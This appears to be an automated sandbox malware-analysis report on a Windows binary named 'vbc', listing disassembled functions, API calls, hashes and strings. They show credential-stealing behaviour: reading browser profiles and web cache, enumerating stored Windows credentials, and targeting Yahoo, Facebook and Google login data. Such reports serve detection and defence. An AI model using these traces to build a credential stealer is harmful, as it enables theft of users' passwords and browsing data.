                                                                                                                                                                        • Instruction ID: 12325825b01e7d439ee1a457c4e284e7a4c6ca08c5b0c0223ff6c3e9a84d8d63
                                                                                                                                                                        • Opcode Fuzzy Hash: 81020742f08cd979592eeacad5d893b131c1d3e65ead4c73e8d07300279ec837
                                                                                                                                                                        • Instruction Fuzzy Hash: 61819172D00128ABDB11EBA5DC85AEE7778EF44314F1404BAF618F7291DB785F448B68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00409A23 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120fileCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040978A: memset.MSVCRT ref: 004097B2
                                                                                                                                                                          • Part of subcall function 0040978A: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 004097D9
                                                                                                                                                                          • Part of subcall function 0040978A: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040981A
                                                                                                                                                                          • Part of subcall function 0040978A: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 00409843
                                                                                                                                                                          • Part of subcall function 0040978A: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040984E
                                                                                                                                                                          • Part of subcall function 0040978A: _wcsicmp.MSVCRT ref: 004098B7
                                                                                                                                                                          • Part of subcall function 00409539: ??2@YAPAXI@Z.MSVCRT ref: 00409542
                                                                                                                                                                        • OpenProcess.KERNEL32(00000040,00000000,?,00000104,00000000,?,00000104,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409A98
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,80000000,00000000,00000000), ref: 00409AB7
                                                                                                                                                                        • DuplicateHandle.KERNELBASE(00000000,00000104,00000000), ref: 00409AC4
                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00409AD9
                                                                                                                                                                          • Part of subcall function 004080FD: GetTempPathW.KERNEL32(00000104,?,?), ref: 00408114
                                                                                                                                                                          • Part of subcall function 004080FD: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00408126
                                                                                                                                                                          • Part of subcall function 004080FD: GetTempFileNameW.KERNELBASE(?,004029F6,00000000,?), ref: 0040813D
                                                                                                                                                                          • Part of subcall function 00407D94: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040DD67,00000000,?,0040FF40,00000000,00000000,?,00000000,00000000), ref: 00407DA6
                                                                                                                                                                        • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00409B03
                                                                                                                                                                        • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 00409B18
                                                                                                                                                                        • WriteFile.KERNELBASE(?,00000000,00000104,0040A0FE,00000000), ref: 00409B33
                                                                                                                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 00409B3A
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 00409B43
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00409B48
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00409B4D
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00409B52
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                        • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$bhv
                                                                                                                                                                        • API String ID: 327780389-4002013007
                                                                                                                                                                        • Opcode ID: 60cb4c962b787243aa5024f235936815de5306e01eef09160c9394b4f9a47f2d
                                                                                                                                                                        • Instruction ID: fb70aa460989ca239fd235d66d785af6871ae45b3eb53ae5652ba3f6cf74083a
                                                                                                                                                                        • Opcode Fuzzy Hash: 60cb4c962b787243aa5024f235936815de5306e01eef09160c9394b4f9a47f2d
                                                                                                                                                                        • Instruction Fuzzy Hash: B9411776900118BBCF119FA5DC499DFBFB9FF09760F108066F604A6252C7749E40DBA8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00410D36 Relevance: 21.2, APIs: 12, Strings: 2, Instructions: 159COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 545 410d36-410df3 memset * 5 call 414558 * 2 wcslen * 2 550 410e10 545->550 551 410df5-410e0e call 4083d6 545->551 553 410e17-410e3a wcslen * 2 550->553 551->553 555 410e57 553->555 556 410e3c-410e55 call 4083d6 553->556 558 410e5e-410e81 wcslen * 2 555->558 556->558 560 410e83-410e9c call 4083d6 558->560 561 410e9e 558->561 563 410ea5-410ee1 call 410b8f * 2 call 408d7d call 411158 560->563 561->563 573 410ee3 563->573 574 410f38-410f44 call 408d9f 563->574 576 410ee7-410f23 memset call 408ecf call 40807e 573->576 582 410f32-410f36 576->582 583 410f25-410f2d call 408e6f 576->583 582->574 584 410ee5 582->584 583->582 584->576
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 00410D59
                                                                                                                                                                        • memset.MSVCRT ref: 00410D6E
                                                                                                                                                                        • memset.MSVCRT ref: 00410D83
                                                                                                                                                                        • memset.MSVCRT ref: 00410D98
                                                                                                                                                                        • memset.MSVCRT ref: 00410DAD
                                                                                                                                                                          • Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592
                                                                                                                                                                          • Part of subcall function 00414558: memset.MSVCRT ref: 004145B1
                                                                                                                                                                          • Part of subcall function 00414558: RegCloseKey.ADVAPI32(?), ref: 00414618
                                                                                                                                                                          • Part of subcall function 00414558: wcscpy.MSVCRT ref: 00414626
                                                                                                                                                                        • wcslen.MSVCRT ref: 00410DD3
                                                                                                                                                                        • wcslen.MSVCRT ref: 00410DE4
                                                                                                                                                                        • wcslen.MSVCRT ref: 00410E1C
                                                                                                                                                                        • wcslen.MSVCRT ref: 00410E2A
                                                                                                                                                                        • wcslen.MSVCRT ref: 00410E63
                                                                                                                                                                        • wcslen.MSVCRT ref: 00410E71
                                                                                                                                                                        • memset.MSVCRT ref: 00410EF7
                                                                                                                                                                          • Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
                                                                                                                                                                          • Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$wcslen$wcscpy$CloseFolderPathSpecialwcscat
                                                                                                                                                                        • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                        • API String ID: 2775653040-2068335096
                                                                                                                                                                        • Opcode ID: 16fea6d73d035c85e3aa7dfabd47b58739e07c54c0bc4e606379bbcb509ea4c4
                                                                                                                                                                        • Instruction ID: 4a87cbf5aa2277a33565dd90cff8ebe3000d96c1f720339e2901549eb91f8fd8
                                                                                                                                                                        • Opcode Fuzzy Hash: 16fea6d73d035c85e3aa7dfabd47b58739e07c54c0bc4e606379bbcb509ea4c4
                                                                                                                                                                        • Instruction Fuzzy Hash: 8451517254121C66DB20E762DD86FCE737C9F85314F1104ABE108E6142EFB99AC4CB59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00410F47 Relevance: 21.2, APIs: 12, Strings: 2, Instructions: 159COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 586 410f47-411004 memset * 5 call 414558 * 2 wcslen * 2 591 411021 586->591 592 411006-41101f call 4083d6 586->592 594 411028-41104b wcslen * 2 591->594 592->594 595 411068 594->595 596 41104d-411066 call 4083d6 594->596 599 41106f-411092 wcslen * 2 595->599 596->599 601 411094-4110ad call 4083d6 599->601 602 4110af 599->602 604 4110b6-4110e8 call 410b8f * 2 call 408d7d call 411158 601->604 602->604 613 4110ed-4110f2 604->613 614 4110f4 613->614 615 411149-411155 call 408d9f 613->615 616 4110f8-411134 memset call 408ecf call 40807e 614->616 623 411143-411147 616->623 624 411136-41113e call 408e6f 616->624 623->615 626 4110f6 623->626 624->623 626->616
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 00410F6A
                                                                                                                                                                        • memset.MSVCRT ref: 00410F7F
                                                                                                                                                                        • memset.MSVCRT ref: 00410F94
                                                                                                                                                                        • memset.MSVCRT ref: 00410FA9
                                                                                                                                                                        • memset.MSVCRT ref: 00410FBE
                                                                                                                                                                          • Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592
                                                                                                                                                                          • Part of subcall function 00414558: memset.MSVCRT ref: 004145B1
                                                                                                                                                                          • Part of subcall function 00414558: RegCloseKey.ADVAPI32(?), ref: 00414618
                                                                                                                                                                          • Part of subcall function 00414558: wcscpy.MSVCRT ref: 00414626
                                                                                                                                                                        • wcslen.MSVCRT ref: 00410FE4
                                                                                                                                                                        • wcslen.MSVCRT ref: 00410FF5
                                                                                                                                                                        • wcslen.MSVCRT ref: 0041102D
                                                                                                                                                                        • wcslen.MSVCRT ref: 0041103B
                                                                                                                                                                        • wcslen.MSVCRT ref: 00411074
                                                                                                                                                                        • wcslen.MSVCRT ref: 00411082
                                                                                                                                                                        • memset.MSVCRT ref: 00411108
                                                                                                                                                                          • Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
                                                                                                                                                                          • Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$wcslen$wcscpy$CloseFolderPathSpecialwcscat
                                                                                                                                                                        • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                        • API String ID: 2775653040-3369679110
                                                                                                                                                                        • Opcode ID: 1044db17df87bea0e64de4cc19f454c88b233916a9b52285606f75aa68ed6d78
                                                                                                                                                                        • Instruction ID: 71a9fb945579d4cb0336c6bc71926503c314de5bf88e5d97c60d5b36565dc427
                                                                                                                                                                        • Opcode Fuzzy Hash: 1044db17df87bea0e64de4cc19f454c88b233916a9b52285606f75aa68ed6d78
                                                                                                                                                                        • Instruction Fuzzy Hash: C3515E729012186ADB20EB51DD86FCF77BD9F85304F1140ABE208E2152EF799BC88B5D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00413627 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 627 413627-41362a 628 41367c 627->628 629 41362c-41367b LoadLibraryW GetProcAddress * 5 627->629 629->628
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryW.KERNELBASE(psapi.dll,00000000,00413607,00000000,004134F7,00000000,?), ref: 00413632
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00413646
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00413652
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041365E
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041366A
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413676
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                        • API String ID: 2238633743-70141382
                                                                                                                                                                        • Opcode ID: 5f75a3f3bddc3dec593a73e6e9b000a2c7294f5667c6c424160f1aaab6163010
                                                                                                                                                                        • Instruction ID: f29cbade6603fc4a2ab0b3c2c5315d136f5cdb5c857cdf3d96e229ab99d62a04
                                                                                                                                                                        • Opcode Fuzzy Hash: 5f75a3f3bddc3dec593a73e6e9b000a2c7294f5667c6c424160f1aaab6163010
                                                                                                                                                                        • Instruction Fuzzy Hash: 07F0B774940784ABDB316F759C09E06BEE0EFA8701721491EE1C153A54D779E040CF88
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040956D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 159COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 630 40956d-40958b call 403b29 633 409591-40959a 630->633 634 409746-409752 call 403ba4 630->634 635 4095ab 633->635 636 40959c-4095a9 CredEnumerateW 633->636 638 4095ad-4095af 635->638 636->638 638->634 640 4095b5-4095de wcslen 638->640 641 409740 640->641 642 4095e4-4095e6 640->642 641->634 642->641 643 4095ec-40960c wcsncmp 642->643 644 409731-40973a 643->644 645 409612-409629 643->645 644->641 644->642 645->645 646 40962b-40965f call 403bb9 645->646 646->644 649 409665-40968b memset 646->649 650 40968d 649->650 651 40968f-4096d5 memcpy 649->651 650->651 652 4096f4-409710 wcschr 651->652 653 4096d7-4096e9 _wcsnicmp 651->653 655 409712-409718 652->655 656 40971b-40972b LocalFree 652->656 653->652 654 4096eb-4096f1 653->654 654->652 655->656 656->644
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00403B29: LoadLibraryW.KERNEL32(advapi32.dll,00000000,00409589,?,00000000,?), ref: 00403B36
                                                                                                                                                                          • Part of subcall function 00403B29: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00403B4F
                                                                                                                                                                          • Part of subcall function 00403B29: GetProcAddress.KERNEL32(?,CredFree), ref: 00403B5B
                                                                                                                                                                          • Part of subcall function 00403B29: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00403B67
                                                                                                                                                                          • Part of subcall function 00403B29: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00403B73
                                                                                                                                                                          • Part of subcall function 00403B29: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00403B7F
                                                                                                                                                                        • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 004095A6
                                                                                                                                                                        • wcslen.MSVCRT ref: 004095CC
                                                                                                                                                                        • wcsncmp.MSVCRT(?,?,00000020,?,00000000,?), ref: 00409602
                                                                                                                                                                        • memset.MSVCRT ref: 00409679
                                                                                                                                                                        • memcpy.MSVCRT ref: 0040969A
                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 004096DF
                                                                                                                                                                        • wcschr.MSVCRT ref: 00409707
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,00000001,?,?,00000000,?), ref: 0040972B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$CredEnumerateFreeLibraryLoadLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                        • String ID: J$Microsoft_WinInet$Microsoft_WinInet_
                                                                                                                                                                        • API String ID: 1313344744-1864008983
                                                                                                                                                                        • Opcode ID: 8deee998723350620581e2bb250fb40e0760f9a8d38c34826a806f855dbf6811
                                                                                                                                                                        • Instruction ID: ea1b4f48df4bf11ab27dc332c663e5edf47b9e63c97f7d7fc3a34612be846c77
                                                                                                                                                                        • Opcode Fuzzy Hash: 8deee998723350620581e2bb250fb40e0760f9a8d38c34826a806f855dbf6811
                                                                                                                                                                        • Instruction Fuzzy Hash: A5511AB1D00209AFDF20DFA5C885AAEB7B8FF08304F14446AE919E7242D738AA45CB54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0044472E Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 658 44472e-444748 call 44493c GetModuleHandleA 661 444769-44476c 658->661 662 44474a-444755 658->662 664 444795-4447e4 __set_app_type __p__fmode __p__commode call 402ca3 661->664 662->661 663 444757-444760 662->663 665 444781-444785 663->665 666 444762-444767 663->666 671 4447e6-4447f1 __setusermatherr 664->671 672 4447f2-444848 call 44492a _initterm __wgetmainargs _initterm 664->672 665->661 670 444787-444789 665->670 666->661 669 44476e-444775 666->669 669->661 673 444777-44477f 669->673 674 44478f-444792 670->674 671->672 677 444858-44485f 672->677 678 44484a-444853 672->678 673->674 674->664 680 4448a6-4448aa 677->680 681 444861-44486c 677->681 679 444912-444917 call 444975 678->679 682 4448ac-4448b1 680->682 683 44487f-444885 680->683 684 444874-444878 681->684 685 44486e-444872 681->685 682->680 689 444887-44488b 683->689 690 44488d-44489e GetStartupInfoW 683->690 684->683 687 44487a-44487c 684->687 685->681 685->684 687->683 689->687 689->690 691 4448a0-4448a4 690->691 692 4448b3-4448b5 690->692 693 4448b6-4448ce GetModuleHandleA call 40ff55 691->693 692->693 696 4448d7-444910 _cexit 693->696 697 4448d0-4448d1 exit 693->697 696->679 697->696
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2827331108-0
                                                                                                                                                                        • Opcode ID: 61a76c3649137508b7a53a801ec47533cdae1a9e4141ff62cc1b1ce7512dd727
                                                                                                                                                                        • Instruction ID: 3deb3861b6046dda02d7dc4087396bab8fe4faf5ffc7b91e65a4640001166331
                                                                                                                                                                        • Opcode Fuzzy Hash: 61a76c3649137508b7a53a801ec47533cdae1a9e4141ff62cc1b1ce7512dd727
                                                                                                                                                                        • Instruction Fuzzy Hash: 3A51C279C00704DFEB30AFA5D8487AE77B4FB86711F20412BF451A7292D7788882CB59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040A420 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040A444
                                                                                                                                                                          • Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592
                                                                                                                                                                          • Part of subcall function 00409FF2: memset.MSVCRT ref: 0040A015
                                                                                                                                                                          • Part of subcall function 00409FF2: memset.MSVCRT ref: 0040A02D
                                                                                                                                                                          • Part of subcall function 00409FF2: wcslen.MSVCRT ref: 0040A049
                                                                                                                                                                          • Part of subcall function 00409FF2: wcslen.MSVCRT ref: 0040A058
                                                                                                                                                                          • Part of subcall function 00409FF2: wcslen.MSVCRT ref: 0040A09F
                                                                                                                                                                          • Part of subcall function 00409FF2: wcslen.MSVCRT ref: 0040A0AE
                                                                                                                                                                          • Part of subcall function 00409539: ??2@YAPAXI@Z.MSVCRT ref: 00409542
                                                                                                                                                                        • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040A4B9
                                                                                                                                                                        • wcschr.MSVCRT ref: 0040A4D0
                                                                                                                                                                        • wcschr.MSVCRT ref: 0040A4F0
                                                                                                                                                                        • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040A515
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0040A51F
                                                                                                                                                                        • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040A54B
                                                                                                                                                                        • FindCloseUrlCache.WININET(?), ref: 0040A55C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CacheFindwcslen$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                                                        • String ID: visited:
                                                                                                                                                                        • API String ID: 615219573-1702587658
                                                                                                                                                                        • Opcode ID: 58ee3583334abb47630858a22ac836657d2b8b3eef5533a356816c3e949a7c62
                                                                                                                                                                        • Instruction ID: a8741c9f70935d188a110af9e9e8f96ccbc1ec5a4ffe9cc29b4dc234b75738c1
                                                                                                                                                                        • Opcode Fuzzy Hash: 58ee3583334abb47630858a22ac836657d2b8b3eef5533a356816c3e949a7c62
                                                                                                                                                                        • Instruction Fuzzy Hash: 5F419F72900219BBDB10EFA5DC85AAEBBB8FF44754F10406AE504F3281DB789E51CB99
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00409B7A Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 724 409b7a-409ba6 call 405e89 call 4060bc 729 409bac-409bea memset 724->729 730 409c9e-409cad call 405ecf 724->730 732 409bed-409bf8 call 4063bb 729->732 735 409bfd-409bff 732->735 736 409c01-409c1e call 409755 * 2 735->736 737 409c75-409c82 call 40607f 735->737 736->737 748 409c20-409c22 736->748 737->732 742 409c88-409c8b 737->742 744 409c96-409c99 call 408f1e 742->744 745 409c8d-409c95 free 742->745 744->730 745->744 748->737 749 409c24-409c3a call 40695a 748->749 749->737 752 409c3c-409c47 call 408ffd 749->752 752->737 755 409c49-409c70 _snwprintf call 408dc5 752->755 755->737
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004060BC: _wcsicmp.MSVCRT ref: 004060ED
                                                                                                                                                                        • memset.MSVCRT ref: 00409BC2
                                                                                                                                                                          • Part of subcall function 004063BB: memset.MSVCRT ref: 004064B7
                                                                                                                                                                        • free.MSVCRT(000000FF,?,000000FF,00000000,00000104,73BCF560), ref: 00409C90
                                                                                                                                                                          • Part of subcall function 00409755: _wcsicmp.MSVCRT ref: 0040976E
                                                                                                                                                                          • Part of subcall function 00408FFD: wcslen.MSVCRT ref: 0040900C
                                                                                                                                                                          • Part of subcall function 00408FFD: _memicmp.MSVCRT ref: 0040903A
                                                                                                                                                                        • _snwprintf.MSVCRT ref: 00409C5C
                                                                                                                                                                          • Part of subcall function 00408DC5: wcslen.MSVCRT ref: 00408DD7
                                                                                                                                                                          • Part of subcall function 00408DC5: free.MSVCRT(?,00000001,?,00000000,?,?,00409290,?,000000FF), ref: 00408DFD
                                                                                                                                                                          • Part of subcall function 00408DC5: free.MSVCRT(?,00000001,?,00000000,?,?,00409290,?,000000FF), ref: 00408E20
                                                                                                                                                                          • Part of subcall function 00408DC5: memcpy.MSVCRT ref: 00408E44
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                        • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                        • API String ID: 2804212203-2982631422
                                                                                                                                                                        • Opcode ID: 016f43b69d351da20f18e3d08cfb22cc6f3daed84736ca8803c7e9159e0743c6
                                                                                                                                                                        • Instruction ID: b0f72644bbd87b50ea7a8f8ee73cfa3b4c243fbe701b8101a2a2b04dab44341a
                                                                                                                                                                        • Opcode Fuzzy Hash: 016f43b69d351da20f18e3d08cfb22cc6f3daed84736ca8803c7e9159e0743c6
                                                                                                                                                                        • Instruction Fuzzy Hash: 29319471D042196AEF50EFA5CC45ADEB7F8AF44344F11007BA519B3182DB38AE448B98
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040A94C Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 104COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00408D9F: free.MSVCRT(?,00409176,00000000,?,00000000), ref: 00408DA2
                                                                                                                                                                          • Part of subcall function 00408D9F: free.MSVCRT(?,?,00409176,00000000,?,00000000), ref: 00408DAA
                                                                                                                                                                          • Part of subcall function 00408F1E: free.MSVCRT(00000000,004092A3,00000000,?,00000000), ref: 00408F25
                                                                                                                                                                          • Part of subcall function 0040A420: memset.MSVCRT ref: 0040A444
                                                                                                                                                                          • Part of subcall function 0040A420: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040A4B9
                                                                                                                                                                          • Part of subcall function 0040A420: wcschr.MSVCRT ref: 0040A4D0
                                                                                                                                                                          • Part of subcall function 0040A420: wcschr.MSVCRT ref: 0040A4F0
                                                                                                                                                                          • Part of subcall function 0040A420: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040A515
                                                                                                                                                                          • Part of subcall function 0040A420: GetLastError.KERNEL32 ref: 0040A51F
                                                                                                                                                                          • Part of subcall function 0040A56F: memset.MSVCRT ref: 0040A5DF
                                                                                                                                                                          • Part of subcall function 0040A56F: RegEnumValueW.ADVAPI32 ref: 0040A60D
                                                                                                                                                                          • Part of subcall function 0040A56F: _wcsupr.MSVCRT ref: 0040A627
                                                                                                                                                                          • Part of subcall function 0040A56F: memset.MSVCRT ref: 0040A676
                                                                                                                                                                          • Part of subcall function 0040A56F: RegEnumValueW.ADVAPI32 ref: 0040A6A1
                                                                                                                                                                          • Part of subcall function 00403C2A: LoadLibraryW.KERNEL32(advapi32.dll,?,0040A9C2,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,00411E75,?,?), ref: 00403C35
                                                                                                                                                                          • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00403C49
                                                                                                                                                                          • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00403C55
                                                                                                                                                                          • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 00403C61
                                                                                                                                                                          • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00403C6D
                                                                                                                                                                          • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403C79
                                                                                                                                                                          • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 00403C85
